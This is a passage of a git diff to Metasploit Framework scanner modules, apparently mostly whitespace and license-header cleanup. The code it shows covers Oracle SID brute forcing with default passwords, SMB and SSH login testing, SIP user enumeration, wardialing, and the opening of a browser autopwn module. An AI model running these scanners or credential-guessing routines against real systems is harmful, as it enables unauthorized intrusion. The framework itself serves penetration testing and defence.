+##
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/
@@ -9,7 +13,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Report
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::Scanner
@@ -39,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 'method' => 'GET',
 'version' => '1.1',
 }, 5)
- 
+
 if ( res.body =~ /SERVICE_NAME=/ )
 sleep(2)
 sid = res.body.scan(/SERVICE_NAME=([^\)]+)/)
diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb
index 28ae9f4046..beb8c5be7f 100644
--- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb
+++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb
@@ -1,7 +1,8 @@
 ##
-#
 # $Id$
-#
+##
+
+##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
@@ -27,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
 'Version' => '$Revision$',
 'DisclosureDate' => 'Jan 7 2009'))
- register_options([Opt::RPORT(1521),], self.class)
+ register_options([Opt::RPORT(1521),], self.class)
 deregister_options('RHOST')
 end
@@ -39,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
 pkt = tns_packet("(CONNECT_DATA=(COMMAND=VERSION))")
 sock.put(pkt)
- 
+
 sleep(0.5)
- 
+
 data = sock.get_once
 if ( data and data =~ /\\*.TNSLSNR for (.*)/ )
diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb
index 78db6d58f0..3a744c323a 100644
--- a/modules/auxiliary/scanner/oracle/xdb_sid.rb
+++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb
@@ -1,5 +1,9 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/
@@ -9,7 +13,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Report
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::Scanner
@@ -41,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
 begin
 user_pass = "#{datastore['DBUSER']}:#{datastore['DBPASS']}"
- 
+
 res = send_request_raw({
 'uri' => '/oradb/PUBLIC/GLOBAL_NAME',
 'version' => '1.0',
@@ -58,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
 end
 if (res.code == 200)
- if (not res.body.length > 0)
+ if (not res.body.length > 0)
 # sometimes weird bug where body doesn't have value yet
 res.body = res.bufq
 end
@@ -68,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
 :proto => 'tcp',
 :type => 'SERVICE_NAME',
 :data => "#{sid}"
- )
+ )
 print_status("Discovered SID: '#{sid}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}")
 else
 print_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...")
diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
index bcf00be338..b5705903cf 100644
--- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
+++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
@@ -1,5 +1,9 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/
@@ -9,7 +13,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
- include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Report
 include Msf::Exploit::Remote::HttpClient
 include Msf::Auxiliary::Scanner
@@ -17,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
 super(
 'Name' => 'Oracle XML DB SID Discovery via Brute Force',
 'Description' => %q{
- This module attempts to retrieve the sid from the Oracle XML DB httpd server,
+ This module attempts to retrieve the sid from the Oracle XML DB httpd server,
 utilizing Pete Finnigan s default oracle password list.
 },
 'Version' => '$Revision: 6876 $',
@@ -62,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
 datastore['DBUSER'] = brute[2].downcase
 datastore['DBPASS'] = brute[3].downcase
 user_pass = "#{datastore['DBUSER']}:#{datastore['DBPASS']}"
- 
+
 res = send_request_raw({
 'uri' => '/oradb/PUBLIC/GLOBAL_NAME',
 'version' => '1.0',
@@ -78,14 +82,14 @@ class Metasploit3 < Msf::Auxiliary
 next
 end
 if (res.code == 200)
- if (not res.body.length > 0)
+ if (not res.body.length > 0)
 # sometimes weird bug where body doesn't have value yet
 res.body = res.bufq
 end
 sid = res.body.scan(/<GLOBAL_NAME>(\S+)<\/GLOBAL_NAME>/)[0]
 report_note(:host => ip, :proto => 'tcp', :type => 'SERVICE_NAME', :data => "#{sid}")
 print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}")
- users.push(user_pass)
+ users.push(user_pass)
 elsif(datastore['VERBOSE'])
 print_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...")
 end
@@ -108,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
 if(res)
 if(res.code == 200)
- if (not res.body.length > 0)
+ if (not res.body.length > 0)
 # sometimes weird bug where body doesn't have value yet
 res.body = res.bufq
 end
@@ -122,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
 s = e.elements['STATUS'].get_text
 report_note(:host => datastore['RHOST'], :proto => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{p}#{v}")
 print_good("\t#{p}\t\t#{v}\t(#{s})")
- 
+
 end
 end
 end
@@ -140,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary if(res) if(res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -169,7 +173,7 @@ class Metasploit3 < Msf::Auxiliary if(res) if(res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -178,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary print_good("Database Link Information ==> as #{u}") doc.elements.each('ALL_DB_LINKS/ROW') do |e| - next if(e.elements['HOST'] == nil or e.elements['USERNAME'] == nil or e.elements['DB_LINK'] == nil) + next if(e.elements['HOST'] == nil or e.elements['USERNAME'] == nil or e.elements['DB_LINK'] == nil) h = e.elements['HOST'].get_text d = e.elements['DB_LINK'].get_text us = e.elements['USERNAME'].get_text @@ -212,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary }, -1) if (res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -248,7 +252,7 @@ class Metasploit3 < Msf::Auxiliary }, -1) if (res.code == 200) - if (not res.body.length > 0) + if (not res.body.length > 0) # sometimes weird bug where body doesn't have value yet res.body = res.bufq end @@ -285,7 +289,7 @@ class Metasploit3 < Msf::Auxiliary end break if good - end # users.each + end # users.each rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 848cc53b08..234179c359 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,11 +16,11 @@ require 'racket' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp - + include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'TCP Port Scanner', @@ -35,14 +35,14 @@ class Metasploit3 < Msf::Auxiliary OptString.new('PORTS', [true, "Ports to scan (e.g. 22-25,80,110-900)", "1-10000"]), OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]) ], self.class) - + deregister_options('RPORT') end - + def run_host(ip) - + timeout = datastore['TIMEOUT'].to_i ports = Rex::Socket.portspec_crack(datastore['PORTS']) diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index 667b71d3c4..1868d740ab 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -13,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SIP username enumerator', 
@@ -29,11 +33,11 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('MINEXT', [true, 'Starting extension',0]), OptInt.new('MAXEXT', [true, 'Ending extension', 9999]), OptInt.new('PADLEN', [true, 'Cero padding maximum length', 4]), - OptString.new('METHOD', [true, 'Enumeration method to use OPTIONS/REGISTER','REGISTER']), + OptString.new('METHOD', [true, 'Enumeration method to use OPTIONS/REGISTER','REGISTER']), Opt::RPORT(5060), Opt::CHOST, Opt::CPORT(5060) - ], self.class) + ], self.class) end @@ -41,17 +45,17 @@ class Metasploit3 < Msf::Auxiliary def run_batch_size datastore['BATCHSIZE'].to_i end - + # Operate on an entire batch of hosts at once def run_batch(batch) - begin + begin udp_sock = nil idx = 0 - + # Create an unbound UDP socket if no CHOST is specified, otherwise # create a UDP socket bound to CHOST (in order to avail of pivoting) - udp_sock = Rex::Socket::Udp.create( + udp_sock = Rex::Socket::Udp.create( { 'LocalHost' => datastore['CHOST'] || nil, 'LocalPort' => datastore['CPORT'].to_i @@ -60,21 +64,21 @@ class Metasploit3 < Msf::Auxiliary mini = datastore['MINEXT'] maxi = datastore['MAXEXT'] - + batch.each do |ip| for i in (mini..maxi) testext = padnum(i,datastore['PADLEN']) - + case datastore['METHOD'] when 'REGISTER' data = create_probe(ip,testext,'REGISTER') - when 'OPTIONS' + when 'OPTIONS' data = create_probe(ip,testext,'OPTIONS') else print_error("Method not found.") - return + return end - + begin udp_sock.sendto(data, ip, datastore['RPORT'].to_i, 0) @@ -97,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary while (r = udp_sock.recvfrom(65535, 3) and r[1]) parse_reply(r,datastore['METHOD']) end - + rescue ::Interrupt raise $! rescue ::Exception => e 
@@ -113,29 +117,29 @@ class Metasploit3 < Msf::Auxiliary def parse_reply(pkt,meth) return if not pkt[1] - + if(pkt[1] =~ /^::ffff:/) pkt[1] = pkt[1].sub(/^::ffff:/, '') end resp = pkt[0].split(/\s+/)[1] - repcode = '' + repcode = '' agent = '' verbs = '' serv = '' - prox = '' - + prox = '' + if(pkt[0] =~ /^To\:\s*(.*)$/i) testn = "#{$1.strip}".split(';')[0] end - + case resp.to_i - when 401 + when 401 print_status("Found user: #{testn} [Auth]") - when 200 + when 200 print_status("Found user: #{testn} [Open]") else - #print_error("Undefined error code: #{resp.to_i}" + #print_error("Undefined error code: #{resp.to_i}" end end @@ -156,10 +160,10 @@ class Metasploit3 < Msf::Auxiliary data << "User-Agent: #{suser}\r\n" data << "Accept: text/plain\r\n" end - + def padnum(num,padding) - if padding >= num.to_s.length + if padding >= num.to_s.length ('0'*(padding-num.to_s.length)) << num.to_s - end - end + end + end end diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 68b886949e..9b7967126c 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SIP Endpoint Scanner', @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(5060), Opt::CHOST, Opt::CPORT(5060) - ], self.class) + ], self.class) end 
@@ -42,14 +42,14 @@ class Metasploit3 < Msf::Auxiliary def run_batch_size datastore['BATCHSIZE'].to_i end - + # Operate on an entire batch of hosts at once def run_batch(batch) - begin + begin udp_sock = nil idx = 0 - + # Create an unbound UDP socket if no CHOST is specified, otherwise # create a UDP socket bound to CHOST (in order to avail of pivoting) udp_sock = Rex::Socket::Udp.create( @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary while (r = udp_sock.recvfrom(65535, 3) and r[1]) parse_reply(r) end - + rescue ::Interrupt raise $! rescue ::Exception => e @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary def parse_reply(pkt) return if not pkt[1] - + if(pkt[1] =~ /^::ffff:/) pkt[1] = pkt[1].sub(/^::ffff:/, '') end @@ -108,15 +108,15 @@ class Metasploit3 < Msf::Auxiliary verbs = '' serv = '' prox = '' - + if(pkt[0] =~ /^User-Agent:\s*(.*)$/i) agent = "agent='#{$1.strip}' " end - + if(pkt[0] =~ /^Allow:\s+(.*)$/i) verbs = "verbs='#{$1.strip}' " end - + if(pkt[0] =~ /^Server:\s+(.*)$/) serv = "server='#{$1.strip}' " end @@ -124,16 +124,16 @@ class Metasploit3 < Msf::Auxiliary if(pkt[0] =~ /^Proxy-Require:\s+(.*)$/) serv = "proxy-required='#{$1.strip}' " end - + print_status("#{pkt[1]} #{resp} #{agent}#{serv}#{prox}#{verbs}") report_service( :host => pkt[1], :port => pkt[2], :proto => 'udp', - :name => 'sip' + :name => 'sip' ) - + if(not agent.empty?) report_note( :host => pkt[1], @@ -160,6 +160,6 @@ class Metasploit3 < Msf::Auxiliary data << "User-Agent: #{suser}\r\n" data << "Accept: text/plain\r\n" end - + end diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 4b5069695b..2a5567e83f 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB - + # Scanner mixin should be near last include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SMB Session Pipe Auditor', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + deregister_options('RPORT') end @@ -60,17 +60,17 @@ class Metasploit3 < Msf::Auxiliary 'PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER', 'db2remotecmd' ] - + # Fingerprint a single host def run_host(ip) pass = [] - + [[139, false], [445, true]].each do |info| datastore['RPORT'] = info[0] datastore['SMBDirect'] = info[1] - + begin connect() smb_login() @@ -83,13 +83,13 @@ class Metasploit3 < Msf::Auxiliary # print_error("Could not open \\#{pipe}: Error 0x%.8x" % e.error_code) end end - + disconnect() break rescue ::Exception => e # print_line($!.to_s) - # print_line($!.backtrace.join("\n")) + # print_line($!.backtrace.join("\n")) end end @@ -97,6 +97,7 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip} - Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}") end end - + end + diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index b4ea97c578..1fbd886eb0 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,10 +18,10 @@ class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::Remote::DCERPC - + # Scanner mixin should be near last include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SMB Session Pipe DCERPC Auditor', @@ -30,12 +30,12 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + deregister_options('RPORT', 'RHOST') register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER)", 'BROWSER']), - ], self.class) + ], self.class) end @@target_uuids = [ @@ -255,7 +255,7 @@ class Metasploit3 < Msf::Auxiliary [ 'fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0' ], [ 'ffe561b8-bf15-11cf-8c5e-08002bb49649', '2.0' ] - + ] # Fingerprint a single host @@ -265,15 +265,15 @@ class Metasploit3 < Msf::Auxiliary datastore['RPORT'] = info[0] datastore['SMBDirect'] = info[1] - + begin connect() smb_login() @@target_uuids.each do |uuid| - + handle = dcerpc_handle( - uuid[0], uuid[1], + uuid[0], uuid[1], 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] ) @@ -283,10 +283,10 @@ class Metasploit3 < Msf::Auxiliary rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e # print_line("UUID #{uuid[0]} #{uuid[1]} ERROR 0x%.8x" % e.error_code) rescue ::Exception => e - # print_line("UUID #{uuid[0]} #{uuid[1]} ERROR #{$!}") + # print_line("UUID #{uuid[0]} #{uuid[1]} ERROR #{$!}") end end - + disconnect() return @@ -295,6 +295,6 @@ class Metasploit3 < Msf::Auxiliary end end end - + end diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index 52c3bbcf06..c3726a3fa5 100644 
--- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary SIMPLE = Rex::Proto::SMB::SimpleClient XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants - + def initialize super( 'Name' => 'SMB 2.0 Protocol Detection', @@ -35,12 +35,12 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + register_options([ Opt::RPORT(445) ], self.class) end # Fingerprint a single host - def run_host(ip) + def run_host(ip) begin connect @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip} supports SMB 2.0") end end - + rescue ::Rex::ConnectionError rescue ::Exception => e print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}") diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 6e37eaffab..2f706edaa3 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -142,9 +142,9 @@ class Metasploit3 < Msf::Auxiliary print_status("#{rhost} - FAILED LOGIN (#{smb_peer_os}) #{user} : #{pass} (#{e.error_reason})") disconnect() - return :next_user # These reasons are sufficient to stop trying. + return :next_user # These reasons are sufficient to stop trying. end - + if(simple.client.auth_user) print_good("#{rhost} - SUCCESSFUL LOGIN (#{smb_peer_os}) '#{user}' : '#{pass}'") report_hash = { diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index a3a3429017..478d2520a6 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb 
+++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index c3fac8d365..d8b97ca5ff 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -30,14 +30,14 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. - If you have loaded a database plugin and connected to a database - this module will record successful logins and hosts so you can - track your access. + If you have loaded a database plugin and connected to a database + this module will record successful logins and hosts so you can + track your access. Note that password-protected key files will not function with this module -- it is designed specifically for unencrypted (passwordless) keys. - + Key files may be a single private (unencrypted) key, or several private keys concatenated together as an ASCII text file. Non-key data should be silently ignored. @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary # Needs an end next unless key =~ /\n-----END [RD]SA PRIVATE KEY-----\x0d?\x0a$/m # Shouldn't have binary. - next unless key.scan(/[\x00-\x08\x0b\x0c\x0e-\x19\x80-\xff]/).empty? + next unless key.scan(/[\x00-\x08\x0b\x0c\x0e-\x19\x80-\xff]/).empty? # Add more tests to taste. keepers << key end 
@@ -218,7 +218,7 @@ class Metasploit3 < Msf::Auxiliary when :missing_keyfile vprint_error "#{ip}:#{rport} - SSH - Cannot read keyfile." when :no_valid_keys - vprint_error "#{ip}:#{rport} - SSH - No cleartext keys in keyfile." + vprint_error "#{ip}:#{rport} - SSH - No cleartext keys in keyfile." end end end diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index d90fea981d..38daca54c2 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -20,7 +24,7 @@ class Object file.close return obj end - + def self.load_from_file filename begin file = Zlib::GzipReader.open(filename) @@ -57,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('INITSTRING', [true, 'Initialization String', 'AT X6 S11=80']), OptString.new('SERIALPORT', [true, 'Serial Port (e.g. 0 (COM1), 1 (COM2), /dev/ttyS0, etc.)', '/dev/ttyS0']), ], self.class) - + register_advanced_options( [ OptInt.new( 'BaudRate', [true, 'Baud Rate', 19200]), @@ -102,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary @confdir = File.join(Msf::Config.get_config_root, 'wardial') @datadir = File.join(Msf::Config.get_config_root, 'logs', 'wardial') - + # make sure working dirs exist FileUtils.mkdir_p(@confdir) FileUtils.mkdir_p(@datadir) 
@@ -214,7 +218,7 @@ class Metasploit3 < Msf::Auxiliary dialval = unidentified[chosen][1] end print_status("#{unidentified.size} of #{dialrange.size} numbers unidentified, #{num_carriers} carriers found, #{num_faxes} faxes found, #{num_busy} busy") - if dialval[:busy] == true + if dialval[:busy] == true print_status("Dialing: #{dialnum} (#{dialtimeout} sec. timeout, previously busy)") else print_status("Dialing: #{dialnum} (#{dialtimeout} sec. timeout, previously undialed)") @@ -371,7 +375,7 @@ class Metasploit3 < Msf::Auxiliary return true end - + def build_dialrange(dialmask) dialrange = {} @@ -427,7 +431,7 @@ class Metasploit3 < Msf::Auxiliary if Time.now >= gotchar + 8 # nudges after 8 seconds of receiving nothing if nudgestring print_status( "Nudging..." ) - modem.puts nudgestring + modem.puts nudgestring end gotchar = Time.now # resets timer so we don't nudge too often end diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index e3efc98c10..c7e62fc4e2 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -36,11 +36,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) begin - + # Create an unbound UDP socket if no CHOST is specified, otherwise # create a UDP socket bound to CHOST (in order to avail of pivoting) - udp_sock = Rex::Socket::Udp.create( - { + udp_sock = Rex::Socket::Udp.create( + { 'LocalHost' => datastore['CHOST'] || nil, 'Context' => { diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index 91e6f0634c..444891129f 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb 
@@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'VNC Authentication None Detection', @@ -41,9 +45,9 @@ class Metasploit3 < Msf::Auxiliary begin banner = sock.get_once(50,1) - # RFB Protocol Version 3.3 (1998-01) - # RFB Protocol Version 3.7 (2003-08) - # RFB Protocol Version 3.8 (2007-06) + # RFB Protocol Version 3.3 (1998-01) + # RFB Protocol Version 3.7 (2003-08) + # RFB Protocol Version 3.8 (2007-06) if (banner and banner =~ /RFB 003\.003|RFB 003\.007|RFB 003\.008/) ver,msg = (banner.split(/\n/)) @@ -60,12 +64,12 @@ class Metasploit3 < Msf::Auxiliary if (msg =~ /Too many security failures/) msg = msg + ". " + "Wait for a moment!" end - print_status("#{target_host}:#{rport}, VNC server warning messages : \"#{msg}\"") - else + print_status("#{target_host}:#{rport}, VNC server warning messages : \"#{msg}\"") + else # send VNC client protocol version cver = ver + "\x0a" sock.put(cver) - + # first byte is number of security types num_types = sock.get_once(1).unpack("C").first if (num_types == 0) 
@@ -80,14 +84,14 @@ class Metasploit3 < Msf::Auxiliary # 16 : Tight (tightvncserver) # 17 : Ultra # 18 : TLS - + sec_type = [] if types sec_type << "None" if (types.include? 1) sec_type << "VNC" if (types.include? 2) - sec_type << "Tight" if (types.include? 16) + sec_type << "Tight" if (types.include? 16) sec_type << "Ultra" if (types.include? 17) - sec_type << "TLS" if (types.include? 18) + sec_type << "TLS" if (types.include? 18) print_status("#{target_host}:#{rport}, VNC server security types supported : #{sec_type.join(",")}") if (types.include? 1) print_status("#{target_host}:#{rport}, VNC server security types includes None, free access!") diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index 92c236df42..390f7a647c 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -25,9 +25,9 @@ require 'rex/exploitation/javascriptosdetect' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Client Automatic Exploiter', 'Version' => '$Revision$', 'Description' => %q{ @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary techniques to fingerprint HTTP clients and then automatically exploit them. }, - 'Author' => + 'Author' => [ # initial concept, integration and extension of Jerome # Athias' os_detect.js 
@@ -45,46 +45,46 @@ class Metasploit3 < Msf::Auxiliary 'Actions' => [ [ 'WebServer', { - 'Description' => 'Start a bunch of modules and direct clients to appropriate exploits' + 'Description' => 'Start a bunch of modules and direct clients to appropriate exploits' } ], [ 'DefangedDetection', { - 'Description' => 'Only perform detection, send no exploits' + 'Description' => 'Only perform detection, send no exploits' } ], - [ 'list', { + [ 'list', { 'Description' => 'List the exploit modules that would be started' } ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'WebServer', 'DefangedDetection' ], 'DefaultAction' => 'WebServer')) register_options([ - OptAddress.new('LHOST', [true, + OptAddress.new('LHOST', [true, 'The IP address to use for reverse-connect payloads' ]), ], self.class) register_advanced_options([ - OptString.new('MATCH', [false, + OptString.new('MATCH', [false, 'Only attempt to use exploits whose name matches this regex' ]), - OptString.new('EXCLUDE', [false, + OptString.new('EXCLUDE', [false, 'Only attempt to use exploits whose name 